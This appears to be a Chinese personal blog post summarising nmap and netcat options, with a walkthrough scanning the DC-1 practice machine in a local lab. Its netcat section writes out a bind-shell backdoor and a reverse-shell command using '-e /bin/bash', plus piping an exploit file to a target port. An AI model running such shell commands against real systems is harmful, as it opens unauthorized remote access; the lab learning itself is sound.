<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#222"><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"><link rel="alternate" href="/rss.xml" title="Glad to see U (◦˙▽˙◦)" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="Glad to see U (◦˙▽˙◦)" type="application/atom+xml"><link rel="alternate" type="application/json" title="Glad to see U (◦˙▽˙◦)" href="https://ctf-learner.github.io/feed.json"><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"><link rel="preconnect" href="https://at.alicdn.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&amp;display=swap&amp;subset=latin,latin-ext" media="none" onload="this.media='all'"><link rel="stylesheet" href="/css/app.css?v=0.4.2"><link rel="modulepreload" href="/js/chunk-LH3UUIAZ.js"><link rel="modulepreload" href="/js/chunk-QRJM7WWL.js"><link rel="modulepreload" href="/js/chunk-RAMJ2IY5.js"><link rel="modulepreload" href="/js/chunk-S3F4KD3R.js"><link rel="modulepreload" href="/js/chunk-YVJPANCJ.js"><link rel="modulepreload" href="/js/comments-YV65DDGU.js"><link rel="modulepreload" href="/js/index.esm-5SVDFJ47.js"><link rel="modulepreload" href="/js/post-RDTJBKFB.js"><link rel="modulepreload" href="/js/quicklink-JZA437DS.js"><link rel="modulepreload" href="/js/search-QNBO6RKT.js"><link rel="modulepreload" href="/js/siteInit.js"><link rel="stylesheet" href="https://npm.webcache.cn/@waline/client@3.0.0-alpha.11/dist/waline.css" media="none" onload="this.media='all'"><link rel="preload" href="https://s2.loli.net/2024/04/15/Ehvinl4RrzboNUP.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/G9n7dTeFO1v5puM.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/wu12NE3xPFzHXGR.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/K3ONcC86izSgWQB.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/15/FERQNTOsm6uHXtl.webp" as="image" fetchpriority="high"><link rel="preload" href="https://s2.loli.net/2024/04/13/j6WVCHGiRb7XyOt.jpg" as="image" fetchpriority="high"><meta name="keywords" content="Attack and Defence,Penetration Test"><meta name="description" content="Never hack for profit"><link rel="canonical" href="https://ctf-learner.github.io/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/"><title>扫描不止 nc&amp;nmap</title><meta name="generator" content="Hexo 7.1.1"></head><body itemscope="" itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope="" itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">扫描不止 nc&amp;nmap</h1><div class="meta"><span class="item" title="创建时间：2024-04-19 15:45:49"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2024-04-19T15:45:49+08:00">2024-04-19</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>10k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>10 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">MorIo24's blog</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/Ehvinl4RrzboNUP.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/G9n7dTeFO1v5puM.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/wu12NE3xPFzHXGR.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/K3ONcC86izSgWQB.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/15/FERQNTOsm6uHXtl.webp&quot;);"></li><li class="item" style="background-image: url(&quot;https://s2.loli.net/2024/04/13/j6WVCHGiRb7XyOt.jpg&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemlistelement="" itemscope="" itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/Penetration-Test/" itemprop="item" rel="index" title="分类于Penetration Test"><span itemprop="name">Penetration Test<meta itemprop="position" content="0"></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://ctf-learner.github.io/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/"><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"><meta itemprop="name" content="MorIo24"><meta itemprop="description" content="Never hack for profit, Never hack for profit"></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="Glad to see U (◦˙▽˙◦)"></span><div class="body md" itemprop="articleBody"><p><span class="label success">上次更新时间：2024-04-19</span><br>
 发现自己几乎每次扫描都要查一查参数选项，而且操作及其磋脚……<br>
 然后生了这篇文章，用来背诵</p>
<h1 id="namp"><a class="anchor" href="#namp">#</a> namp</h1>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>nmap <span class="token punctuation">[</span>Scan Type<span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token punctuation">[</span>Options<span class="token punctuation">]</span> <span class="token punctuation">{</span>target specification<span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><h2 id="目标说明"><a class="anchor" href="#目标说明">#</a> 目标说明</h2>
<details class="primary"><summary>官方解释👇</summary><div>
<div class="note info">
<p>ip/&lt;numbit&gt;: Nmap 将会扫描所有和该参考 IP 地址具有 &lt;numbit &gt; 相同比特的所有 IP 地址或主机.</p>
</div>
<div class="note primary">
<p>例如，192.168.10.0/24 将会扫描 192.168.10.0 和 192.168.10.255 之间的 256 台主机。192.168.10.40/24 将会做同样的事情。</p>
</div>
</div></details>
<h2 id="主机发现"><a class="anchor" href="#主机发现">#</a> 主机发现</h2>
<table>
<thead>
<tr>
<th>选项</th>
<th>作用</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>-iL &lt;inputfilename&gt;</td>
<td>从文件中输入</td>
<td>--excludefile &lt;excludefile&gt; 同理</td>
</tr>
<tr>
<td>--exclude &lt;host1[，host2][，host3]，...&gt;</td>
<td>排除主机 / 网络</td>
<td>以逗号分隔的列表排除它们</td>
</tr>
<tr>
<td>-sL</td>
<td>列表扫描</td>
<td>仅仅列出指定网络上的每台主机， 不发送任何报文到目标主机</td>
</tr>
<tr>
<td>-sP</td>
<td>Ping 扫描</td>
<td>进行 ping 扫描，打印出对扫描做出响应的主机</td>
</tr>
<tr>
<td>-P0</td>
<td>无 ping</td>
<td>-Pn 常用</td>
</tr>
<tr>
<td>-n</td>
<td>不用域名解析</td>
<td>不对它发现的活动 IP 地址进行反向域名解析</td>
</tr>
</tbody>
</table>
<h2 id="端口扫描"><a class="anchor" href="#端口扫描">#</a> 端口扫描</h2>
<p>nmap 把端口分成六个状态: open (开放的)， closed (关闭的)，filtered (被过滤的)， unfiltered (未被过滤的)， open|filtered (开放或者被过滤的)，或者 closed|filtered (关闭或者被过滤的)</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>作用</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>-sS</td>
<td>TCP SYN 扫描</td>
<td><strong>常用</strong>、快速执行、不打开一个完全的 TCP 链接</td>
</tr>
<tr>
<td>-sT</td>
<td>TCP connect () 扫描</td>
<td></td>
</tr>
<tr>
<td>-sU</td>
<td>UDP 扫描</td>
<td>UDP 扫描一般较慢，可以使用 --host-timeout 跳过慢速的主机</td>
</tr>
<tr>
<td>-p &lt;port ranges&gt;</td>
<td>只扫描指定的端口或端口范围</td>
<td>-p - 从端口 1 扫描到 65535</td>
</tr>
<tr>
<td>-sV</td>
<td>版本探测</td>
<td>也可以 - A 同时启用操作系统检测和版本检测</td>
</tr>
</tbody>
</table>
<h2 id="-a选项的使用"><a class="anchor" href="#-a选项的使用">#</a> -A 选项的使用</h2>
<table>
<thead>
<tr>
<th style="text-align:center">选项</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">-A + -sV</td>
<td>启用版本检测，用于识别目标主机上运行的服务及其版本信息</td>
</tr>
<tr>
<td style="text-align:center">-A + -O</td>
<td>启用操作系统检测，尝试识别目标主机的操作系统类型和版本</td>
</tr>
<tr>
<td style="text-align:center">-A + -T4</td>
<td>设置扫描的速度级别为快速（4），加快扫描速度但可能导致被检测到</td>
</tr>
<tr>
<td style="text-align:center">-A</td>
<td>执行高级扫描和识别</td>
</tr>
</tbody>
</table>
<h2 id="输出格式"><a class="anchor" href="#输出格式">#</a> 输出格式</h2>
<table>
<thead>
<tr>
<th>选项</th>
<th>作用</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>-oN &lt;filespec&gt;</td>
<td>标准输出</td>
<td>直接写入指定的文件</td>
</tr>
<tr>
<td>-oG &lt;filespec&gt;</td>
<td>Grep 输出</td>
<td></td>
</tr>
</tbody>
</table>
<h2 id="常用实例"><a class="anchor" href="#常用实例">#</a> 常用实例</h2>
<div class="note warning">
<p><strong>注意：</strong><br>
如果是为了测试，<a target="_blank" rel="noopener external nofollow noreferrer" href="http://scanme.nmap.org">scanme.nmap.org</a> 允许被扫描。但仅允许使用 Nmap 扫描并禁止测试漏洞或进行 DoS 攻击。</p>
</div>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>nmap <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span>/<span class="token operator">&lt;</span>子网掩码<span class="token operator">&gt;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment"># 网段扫描</span></pre></td></tr><tr><td data-num="3"></td><td><pre>nmap <span class="token parameter variable">-sP</span> ip/子网掩码 </pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment"># 扫描存活主机</span></pre></td></tr><tr><td data-num="5"></td><td><pre>nmap <span class="token parameter variable">-sV</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span> <span class="token parameter variable">-p</span> <span class="token operator">&lt;</span>端口号或范围<span class="token operator">&gt;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>nmap <span class="token parameter variable">-sS</span> -p- <span class="token number">192.168</span>.0.2 <span class="token comment"># 扫描主机全部端口</span></pre></td></tr><tr><td data-num="7"></td><td><pre>nmap <span class="token parameter variable">-sP</span> <span class="token number">172.20</span>.x.x/24</pre></td></tr></tbody></table></figure><p>nmap 的进阶暂时用不到，有空补充</p>
<h1 id="nc基础使用"><a class="anchor" href="#nc基础使用">#</a> nc 基础使用</h1>
<p>监听本地端口</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-lvvp</span> <span class="token operator">&lt;</span>port<span class="token operator">&gt;</span></pre></td></tr></tbody></table></figure><p>连接指定端口</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>port<span class="token operator">&gt;</span></pre></td></tr></tbody></table></figure><h2 id="传送exp"><a class="anchor" href="#传送exp">#</a> 传送 exp</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">cat</span> exp.txt <span class="token operator">|</span> <span class="token function">nc</span> <span class="token parameter variable">-nv</span> <span class="token number">192.168</span>.x.x <span class="token number">80</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-nv</span> <span class="token number">192.168</span>.x.x <span class="token number">80</span> <span class="token operator">&lt;</span> exp.txt</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment"># 两种方式均可以讲 exp 输送到指定端口，而服务器需要开放对应端口</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token parameter variable">-p</span> <span class="token number">80</span> <span class="token operator">&gt;</span> /tmp/received_exploit.txt</pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token comment"># 服务器监听端口并保存 exp</span></pre></td></tr></tbody></table></figure><h2 id="日志打印"><a class="anchor" href="#日志打印">#</a> 日志打印</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token parameter variable">-p</span> <span class="token number">80</span> <span class="token operator">&gt;&gt;</span> /apache/log.txt</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment"># 在 awd 中，攻击 80 端口的信息都会被打印下来，&gt; 表示覆写，&gt;&gt; 表示追加</span></pre></td></tr></tbody></table></figure><h1 id="nc命令进阶使用"><a class="anchor" href="#nc命令进阶使用">#</a> nc 命令进阶使用</h1>
<h2 id="创造后门"><a class="anchor" href="#创造后门">#</a> 创造后门</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>ncat <span class="token parameter variable">-l</span> <span class="token number">10000</span> <span class="token parameter variable">-e</span> /bin/bash</pre></td></tr></tbody></table></figure><p><code>-e</code>  标志将一个  <code>bash</code>  与端口  <code>10000</code>  相连。现在客户端只要连接到服务器上的  <code>10000</code>  端口就能通过  <code>bash</code>  获取我们系统的完整访问权限：</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>ncat <span class="token number">192.168</span>.1.100 <span class="token number">10000</span> <span class="token comment"># 攻击机上连接服务器</span></pre></td></tr></tbody></table></figure><h2 id="扫描端口"><a class="anchor" href="#扫描端口">#</a> 扫描端口</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token punctuation">[</span>options<span class="token punctuation">]</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>port-port<span class="token operator">&gt;</span></pre></td></tr></tbody></table></figure><p>可以利用 - w 设置超时时间，-z 扫描，-u 设置为 UDP 模式，例如：</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-u</span> <span class="token parameter variable">-z</span> <span class="token parameter variable">-w2</span> <span class="token number">192.168</span>.0.1 <span class="token number">1</span>-65535 <span class="token comment"># 扫描 192.168.0.3 的端口 范围是 1-65535 即全部端口</span></pre></td></tr></tbody></table></figure><div class="note warning">
<p><strong>注意：nc 扫描会留下大量的痕迹。</strong></p>
</div>
<h2 id="反向连接弹shell"><a class="anchor" href="#反向连接弹shell">#</a> 反向连接弹 shell</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-e</span> /bin/bash <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>port<span class="token operator">&gt;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment"># 服务端发起连接</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-lvp</span> <span class="token operator">&lt;</span>port<span class="token operator">&gt;</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment"># 攻击机连 shell</span></pre></td></tr></tbody></table></figure><h1 id="实战一下"><a class="anchor" href="#实战一下">#</a> 实战一下</h1>
<p>正好第一次打靶机学习渗透，以 dc-1 靶机为例</p>
<p>kali 和 dc-1 的网络适配器都在 NET 模式，kali 的 <code>ip：192.168.234.134</code></p>
<p>先简单扫描一下</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─<span class="token comment"># nmap -sP 192.168.234.0/24</span></pre></td></tr><tr><td data-num="2"></td><td><pre>Starting Nmap <span class="token number">7.94</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-04-15 <span class="token number">11</span>:13 EDT</pre></td></tr><tr><td data-num="3"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.1</pre></td></tr><tr><td data-num="4"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.0037s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="5"></td><td><pre>MAC Address: 00:50:56:C0:00:08 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.2</pre></td></tr><tr><td data-num="7"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00078s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="8"></td><td><pre>MAC Address: 00:50:56:E0:4C:0C <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="9"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.129</pre></td></tr><tr><td data-num="10"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00040s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="11"></td><td><pre>MAC Address: 00:0C:29:02:FE:AE <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.254</pre></td></tr><tr><td data-num="13"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00071s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="14"></td><td><pre>MAC Address: 00:50:56:F6:24:83 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="15"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.134</pre></td></tr><tr><td data-num="16"></td><td><pre>Host is up.</pre></td></tr><tr><td data-num="17"></td><td><pre>Nmap done: <span class="token number">256</span> IP addresses <span class="token punctuation">(</span><span class="token number">5</span> hosts up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">2.13</span> seconds</pre></td></tr></tbody></table></figure><p>用 arp-scan 同理</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─<span class="token comment"># arp-scan -l</span></pre></td></tr><tr><td data-num="2"></td><td><pre>Interface: eth0, type: EN10MB, MAC: 00:0c:29:31:18:c8, IPv4: <span class="token number">192.168</span>.234.134</pre></td></tr><tr><td data-num="3"></td><td><pre>Starting arp-scan <span class="token number">1.10</span>.0 with <span class="token number">256</span> hosts <span class="token punctuation">(</span>https://github.com/royhills/arp-scan<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token number">192.168</span>.234.1   00:50:56:c0:00:08       VMware, Inc.</pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token number">192.168</span>.234.2   00:50:56:e0:4c:0c       VMware, Inc.</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token number">192.168</span>.234.129 00:0c:29:02:fe:ae       VMware, Inc.</pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token number">192.168</span>.234.254 00:50:56:f6:24:83       VMware, Inc.</pre></td></tr><tr><td data-num="8"></td><td><pre></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token number">4</span> packets received by filter, <span class="token number">0</span> packets dropped by kernel</pre></td></tr><tr><td data-num="10"></td><td><pre>Ending arp-scan <span class="token number">1.10</span>.0: <span class="token number">256</span> hosts scanned <span class="token keyword">in</span> <span class="token number">2.310</span> seconds <span class="token punctuation">(</span><span class="token number">110.82</span> hosts/sec<span class="token punctuation">)</span>.</pre></td></tr></tbody></table></figure><p>然后深度扫描</p>
<details open="">
<summary><span class="pre-summary">&nbsp;</span>👇结果有点长，点击展开逐条讲解</summary><figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─<span class="token comment"># nmap -sV -A 192.168.234.129 </span></pre></td></tr><tr><td data-num="2"></td><td><pre>Starting Nmap <span class="token number">7.94</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-04-15 <span class="token number">12</span>:19 EDT</pre></td></tr><tr><td data-num="3"></td><td><pre>Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.234.129  </pre></td></tr><tr><td data-num="4"></td><td><pre>Host is up <span class="token punctuation">(</span><span class="token number">0</span>.0016s latency<span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="5"></td><td><pre>Not shown: <span class="token number">997</span> closed tcp ports <span class="token punctuation">(</span>reset<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>PORT    STATE SERVICE VERSION</pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token number">22</span>/tcp  <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH <span class="token number">6</span>.0p1 Debian <span class="token number">4</span>+deb7u7 <span class="token punctuation">(</span>protocol <span class="token number">2.0</span><span class="token punctuation">)</span>    <span class="token comment"># 服务类型、版本，系统版本、协议</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token operator">|</span> ssh-hostkey:      <span class="token comment"># 密钥类型</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token operator">|</span>   <span class="token number">1024</span> c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f <span class="token punctuation">(</span>DSA<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token operator">|</span>   <span class="token number">2048</span> <span class="token number">11</span>:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 <span class="token punctuation">(</span>RSA<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token operator">|</span>_  <span class="token number">256</span> 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token number">80</span>/tcp  <span class="token function">open</span>  http    Apache httpd <span class="token number">2.2</span>.22 <span class="token variable"><span class="token punctuation">((</span>Debian<span class="token punctuation">))</span></span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token operator">|</span>_http-title: Welcome to Drupal Site <span class="token operator">|</span> Drupal Site</pre></td></tr><tr><td data-num="14"></td><td><pre><span class="token operator">|</span>_http-server-header: Apache/2.2.22 <span class="token punctuation">(</span>Debian<span class="token punctuation">)</span>  <span class="token comment"># apache 服务器以及版本</span></pre></td></tr><tr><td data-num="15"></td><td><pre><span class="token operator">|</span> http-robots.txt: <span class="token number">36</span> disallowed entries <span class="token punctuation">(</span><span class="token number">15</span> shown<span class="token punctuation">)</span>   <span class="token comment"># robots.txt 的 disable 路径</span></pre></td></tr><tr><td data-num="16"></td><td><pre><span class="token operator">|</span> /includes/ /misc/ /modules/ /profiles/ /scripts/ </pre></td></tr><tr><td data-num="17"></td><td><pre><span class="token operator">|</span> /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </pre></td></tr><tr><td data-num="18"></td><td><pre><span class="token operator">|</span> /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </pre></td></tr><tr><td data-num="19"></td><td><pre><span class="token operator">|</span>_/LICENSE.txt /MAINTAINERS.txt</pre></td></tr><tr><td data-num="20"></td><td><pre><span class="token operator">|</span>_http-generator: Drupal <span class="token number">7</span> <span class="token punctuation">(</span>http://drupal.org<span class="token punctuation">)</span>  <span class="token comment"># 网址使用的 cms 以及版本，还有官方网址</span></pre></td></tr><tr><td data-num="21"></td><td><pre><span class="token number">111</span>/tcp <span class="token function">open</span>  rpcbind <span class="token number">2</span>-4 <span class="token punctuation">(</span>RPC <span class="token comment">#100000)  # 主机开放 111 端口</span></pre></td></tr><tr><td data-num="22"></td><td><pre><span class="token operator">|</span> rpcinfo:       <span class="token comment"># 正在运行 rpcbind 服务   （远程过程调用）</span></pre></td></tr><tr><td data-num="23"></td><td><pre><span class="token operator">|</span>   program version    port/proto  <span class="token function">service</span>   <span class="token comment"># 正在运行的 RPC 程序和端口</span></pre></td></tr><tr><td data-num="24"></td><td><pre><span class="token operator">|</span>   <span class="token number">100000</span>  <span class="token number">2,3</span>,4        <span class="token number">111</span>/tcp   rpcbind</pre></td></tr><tr><td data-num="25"></td><td><pre><span class="token operator">|</span>   <span class="token number">100000</span>  <span class="token number">2,3</span>,4        <span class="token number">111</span>/udp   rpcbind</pre></td></tr><tr><td data-num="26"></td><td><pre><span class="token operator">|</span>   <span class="token number">100000</span>  <span class="token number">3,4</span>          <span class="token number">111</span>/tcp6  rpcbind</pre></td></tr><tr><td data-num="27"></td><td><pre><span class="token operator">|</span>   <span class="token number">100000</span>  <span class="token number">3,4</span>          <span class="token number">111</span>/udp6  rpcbind</pre></td></tr><tr><td data-num="28"></td><td><pre><span class="token operator">|</span>   <span class="token number">100024</span>  <span class="token number">1</span>          <span class="token number">39478</span>/udp   status</pre></td></tr><tr><td data-num="29"></td><td><pre><span class="token operator">|</span>   <span class="token number">100024</span>  <span class="token number">1</span>          <span class="token number">40676</span>/tcp   status</pre></td></tr><tr><td data-num="30"></td><td><pre><span class="token operator">|</span>   <span class="token number">100024</span>  <span class="token number">1</span>          <span class="token number">42791</span>/tcp6  status</pre></td></tr><tr><td data-num="31"></td><td><pre><span class="token operator">|</span>_  <span class="token number">100024</span>  <span class="token number">1</span>          <span class="token number">52968</span>/udp6  status</pre></td></tr><tr><td data-num="32"></td><td><pre>MAC Address: 00:0C:29:02:FE:AE <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="33"></td><td><pre>Device type: general purpose</pre></td></tr><tr><td data-num="34"></td><td><pre>Running: Linux <span class="token number">3</span>.X   <span class="token comment"># 系统类型和内核版本</span></pre></td></tr><tr><td data-num="35"></td><td><pre>OS CPE: cpe:/o:linux:linux_kernel:3</pre></td></tr><tr><td data-num="36"></td><td><pre>OS details: Linux <span class="token number">3.2</span> - <span class="token number">3.16</span>   <span class="token comment"># 内核版本范围</span></pre></td></tr><tr><td data-num="37"></td><td><pre>Network Distance: <span class="token number">1</span> hop   <span class="token comment"># 指示设备与扫描器之间的网络距离为 1 跳，表示它们在同一个局域网中。</span></pre></td></tr><tr><td data-num="38"></td><td><pre>Service Info: OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel</pre></td></tr><tr><td data-num="39"></td><td><pre></pre></td></tr><tr><td data-num="40"></td><td><pre>TRACEROUTE</pre></td></tr><tr><td data-num="41"></td><td><pre>HOP RTT     ADDRESS</pre></td></tr><tr><td data-num="42"></td><td><pre><span class="token number">1</span>   <span class="token number">1.59</span> ms <span class="token number">192.168</span>.234.129</pre></td></tr><tr><td data-num="43"></td><td><pre></pre></td></tr><tr><td data-num="44"></td><td><pre>Nmap done: <span class="token number">1</span> IP address <span class="token punctuation">(</span><span class="token number">1</span> <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">25.10</span> seconds</pre></td></tr></tbody></table></figure></details>
<p>两个命令还不足以展现 nmap 的强大，在后面会深入学习</p>
<h3 id="完整使用说明"><a class="anchor" href="#完整使用说明">#</a> 完整使用说明</h3>
<blockquote>
